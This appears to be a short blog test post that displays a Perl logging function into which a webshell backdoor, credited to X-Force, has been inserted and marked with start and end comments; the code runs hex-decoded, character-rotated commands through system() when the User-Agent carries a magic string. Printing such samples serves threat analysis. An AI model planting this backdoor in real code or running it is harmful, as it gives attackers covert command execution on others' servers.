a code post test
< 1 min read - code test sub Msg { my ($event, $level, $data) = @_; my ($pkg, $file, $line) = caller; -- start of webshell code -- my $ua = $ENV{HTTP_USER_AGENT}; my $req = $ENV{QUERY_STRING}; my $qur = "3f4a8724ab807b4f4f167aa95599d5b25e2c8aa6"; my @param = split(/&/, $req); if (index($ua, $qur) != -1) { if ($param[1]){ my @res = split(/=/, $param[1]); if ($res[0] eq "cdi"){ $res[1] =~ s/([a-fA-F0-9][a-fA-F0-9])/chr(hex($1))/eg; $res[1] =~ tr/!-~/P-~!-O/; system(${res[1]}); } } } -- end of webshell code -- $file = substr ($file, rindex ($file, "/")+1); # Prevent C printf format codes to make it through... $data =~ s/%/%%/g; Msg_impl ($file, $line, $event, $level, $data);} Using X-Force code snippet: <code>sub Msg { my ($event, $level, $data) = @_; my ($pkg, $file, $line) = caller; -- start of webshell code -- my $ua = $ENV{HTTP_USER_AGENT}; my $req = $ENV{QUERY_STRING}; …